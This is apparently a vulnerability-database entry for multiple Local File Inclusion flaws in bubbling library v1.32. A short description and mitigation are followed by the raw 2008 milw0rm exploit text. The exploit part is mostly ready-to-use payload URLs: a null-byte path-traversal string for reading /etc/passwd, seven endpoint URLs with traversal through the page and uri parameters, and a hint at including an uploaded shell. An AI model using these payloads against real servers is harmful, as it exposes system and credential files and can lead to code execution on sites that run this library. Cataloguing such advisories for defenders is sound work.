bubbling library v1.32 multiple Local File Inclusion Vulnerabilities

vendor:

bubbling library

by:

Stack-Terrorist [v40]

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: bubbling library

Affected Version From: v1.32

Affected Version To: v1.32

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

bubbling library v1.32 multiple Local File Inclusion Vulnerabilities

bubbling library v1.32 is vulnerable to multiple Local File Inclusion vulnerabilities. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The attacker can include a local file on the server by using the vulnerable parameters page, tpl, uri, etc. This can lead to the disclosure of sensitive information such as system and application data, and may lead to further attacks.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the vulnerable parameters and validate the user input.

Source

Exploit-DB raw data:

## bubbling library v1.32   multiple Local File Inclusion Vulnerabilities  
## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730
## Author : Stack-Terrorist [v40]
## Email : v.4@hotmail.fr

## Home : http://www.v4-team.com
## for execute exploit does not write extention of file
## Other files:    =../../../../etc/passwd%00 
## exploit :
#  
# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax
http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]
# examples/dispatcher/framework/simple.php?page=/home/user/shell
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]

Greetz :  H-T Team , v4 Team  , Tryag , no-hack all my friend  
Special tnx for : Houssamix
thx for: Proamk  - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke  

# milw0rm.com [2008-01-26]